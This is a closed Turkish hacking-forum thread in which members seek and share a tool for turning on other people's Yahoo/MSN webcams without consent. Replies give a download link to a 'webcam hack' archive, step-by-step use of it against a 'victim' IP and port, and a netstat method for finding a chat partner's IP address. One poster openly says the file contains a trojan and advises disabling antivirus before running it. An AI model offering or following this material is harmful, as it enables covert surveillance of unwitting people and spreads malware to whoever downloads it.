yahoo webcam

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

climcool57

Yeni üye
19 Nis 2009
32
0
arkadaşlar,izinsiz webcam açma programı arıyorum özellikle yahoo'da,yardımcı olabilir misiniz?

Adrenn

Katılımcı Üye
21 Mar 2009
339
0
buyur kardes istediğin program yanlıs rapıd hata veriyo f5 le ve defalarca yenile yap linkte sorun yok link calısmıyo demeyin bağlantısı hatası alabilirsn ama dediğğim defalarca yenile oluyo olmadı ben sana upload tekrar edebilirm bidaha pcme indirmek istemiyorum...

http://rapidshare.com/files/183682020/LeitoWebcamHack.rar

programın kullanısı:

1Programı indirdik kurduk (VLC media player)

2Programı Calıstırıoruz

3Dosya>ağ Akışı Aç dioruz alt tarafta Customize yazan yerin sag tarafına yukarda msn den ipsini ve port numarasını öğrendiğimiz kurbanın adresini ÖNEMLi====> https://tik.lat/N29CB port seklinde yazıoruz ve OK dioruz

elrebelde

Katılımcı Üye
8 Eyl 2008
319
0
kayseri
buyur kardes istediğin program yanlıs rapıd hata veriyo f5 le ve defalarca yenile yap linkte sorun yok link calısmıyo demeyin bağlantısı hatası alabilirsn ama dediğğim defalarca yenile oluyo olmadı ben sana upload tekrar edebilirm bidaha pcme indirmek istemiyorum...

http://rapidshare.com/files/183682020/LeitoWebcamHack.rar

programın kullanısı:

1Programı indirdik kurduk (VLC media player)

2Programı Calıstırıoruz

3Dosya>ağ Akışı Aç dioruz alt tarafta Customize yazan yerin sag tarafına yukarda msn den ipsini ve port numarasını öğrendiğimiz kurbanın adresini ÖNEMLi====> [url]https://tik.lat/4h1PV
port seklinde yazıoruz ve OK dioruz

hacı detay verırmsn kullanımda?? tam olarak yane

Adrenn

Katılımcı Üye
21 Mar 2009
339
0
eyvallah dostum,indircem virus falan yoktur demi?

dostum dosyanın icinde virüs mevcuttur saten vermeden öncede söledim bu tür programlarda trojen virüs olması doğal indirirken antivirüslerin uyarı verebilir..devre dısı bırakıp indirip kullanabilirsn yanlız bu programla isin bittikten sonra virüs programıyla pcni tara temizle...kolay gelsin

climcool57

Yeni üye
19 Nis 2009
32
0
yardım.

arkadaşlar programı kendi ip nomla denedim fakat kamera ışığı yandığı halde görüntü alamadım.Bu normal mi?bide şöyle bi p no olabilir mi 64.4.36.32:1863 veya 207.46.28.81:80

Adrenn

Katılımcı Üye
21 Mar 2009
339
0
kurbanın adresi önemli demişsiniz,ip no sundan mı bahsediyosunuz?eğer öyleyse nasıl öğrenebiliriz ip yi?

kurpanın adresinden kastım tabiki ip adres saten msninizde görüstüğünüz kisi üzerinde deniyosunuz...ipi lazım tabiki..kardesim ip adresini bulmak icin bi cok defa söylendi ve herkes biliyodur sanırım en kolay yolu programsız karsı taraf bisey yollasın size bi sarkı baslat-çalıstır-cmd acılan pencereye netstat -an
yazın.5-6 tane sayı çıkacaktır.Bunların yanında LISTENING yazanlar değildir ona göre.Genelde 2 tane ESTSHHABLED yazan
numaralardır bunlarında 84 ya da 85 ile başlayanıdır.bu uygulamayı yaparken baska kimseyle konusmaın ve baska siteye girmeyin yanlıslık olmaması iicn bunda sonuc almayı bilmiyosanız bi sürü programı paylasıldı forumda mevcut...

Ya da karşı tarafa bir dosya yollayın (müzik veya resim tavsiyemdir) Başlat>Çalıştır'a cmd yazın.Çıkan pencereye netstat -n
yazın.5-6 tane sayı çıkacaktır.Bunların yanında LISTENING yazanlar değildir ona göre.Genelde 2 tane ESTSHHABLED yazan
numaralardır bunlarında 84 ya da 85 ile başlayanıdır..

ip bulma böyle gerisi anlattıgım gibi programı kullanmanızda kolay gelsin...

Adrenn

Katılımcı Üye
21 Mar 2009
339
0
arkadaşlar programı kendi ip nomla denedim fakat kamera ışığı yandığı halde görüntü alamadım.Bu normal mi?bide şöyle bi p no olabilir mi 64.4.36.32:1863 veya 207.46.28.81:80

kardesim portlar verdiğin sekilde otomotik varsayılan olarak otomotik ayarlıdır doğal oalrak normal ama siz değistirebiliyosnuz...

5 Ocak 2010
27
0
yahoo ile ilgili nick almada ki kısıtlamaya çözümmmm lütfennnnnn.bazıları istediği gibi çok güzel nick kullanıyo ama bizzzzzzzzze yokkk offfffffoffff____turkkk___ gibi bi idd almak sitiyom:)))

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.